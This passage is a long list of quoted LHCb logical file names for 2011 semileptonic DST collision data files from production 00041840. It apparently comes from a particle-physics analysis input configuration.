'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060185_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000140_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066707_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062924_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045991_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010975_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004787_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016090_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007618_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045643_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007717_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062765_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046327_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056448_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055032_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028540_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000084_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030551_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022501_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036627_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000963_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054106_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036987_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040767_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022458_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049308_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046470_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032690_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053989_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022683_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044983_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061102_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037221_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056832_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023889_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063904_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064554_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051477_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034243_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033771_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009231_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041995_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059875_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059705_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003204_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005799_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022459_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021289_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027116_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067036_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051448_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059478_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041258_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033149_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035322_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001492_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047398_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003002_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017855_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060860_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026411_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059366_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027602_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056261_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033102_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035550_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020335_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033678_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042652_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048857_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020916_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029285_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055017_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032712_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062575_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020760_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004383_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024423_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036749_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042719_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067090_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055697_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022684_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012568_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033845_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000182_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002453_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065361_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047273_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041838_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055415_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001303_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065347_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015117_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000863_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012202_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040672_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003368_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059431_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047546_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002313_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037060_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026638_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016556_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028142_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002002_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018346_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062220_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063671_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017397_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021017_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067810_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052322_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057425_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061409_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051193_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052094_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036332_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059120_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032241_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046658_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016196_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063894_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007870_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034708_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051566_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016696_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008196_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052493_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052224_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001257_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043061_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015017_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002469_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057996_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063146_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040549_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027878_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028405_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032451_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052156_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045644_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028556_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056480_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040852_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037409_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014483_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059785_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064961_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042740_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050660_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059655_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056510_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063684_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044359_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040008_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053067_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056404_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062240_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018788_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040536_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061724_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019455_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065780_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064816_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022838_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047159_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049017_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002396_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067091_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048806_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001362_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022187_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054166_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029202_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022685_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060600_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034982_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035918_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028055_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043023_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066282_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062235_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047144_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034939_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025649_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018445_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008718_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001733_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041308_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042651_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006627_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057447_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003800_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014705_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053314_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003247_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069388_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015236_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053099_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021311_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038761_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057751_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009495_1.semileptonic.dst',
